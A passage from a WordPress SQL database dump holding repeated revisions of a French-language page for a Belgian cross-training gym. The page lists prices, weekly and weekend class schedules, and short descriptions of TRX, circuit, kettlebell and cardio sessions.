0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:53:51', '2013-07-03 16:53:51', '', 11, 'http://www.crosstrainingcenter.be/?p=177', 0, 'revision', '', 0),
(178, 1, '2013-07-03 17:01:04', '2013-07-03 17:01:04', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table class=\"tabb\">\r\n<tr>\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:01:04', '2013-07-03 17:01:04', '', 11, 'http://www.crosstrainingcenter.be/?p=178', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(182, 1, '2013-07-03 17:05:17', '2013-07-03 17:05:17', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:05:17', '2013-07-03 17:05:17', '', 11, 'http://www.crosstrainingcenter.be/?p=182', 0, 'revision', '', 0),
(179, 1, '2013-07-03 17:01:59', '2013-07-03 17:01:59', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr class=\"tabb\">\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr class=\"tabb\">\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une 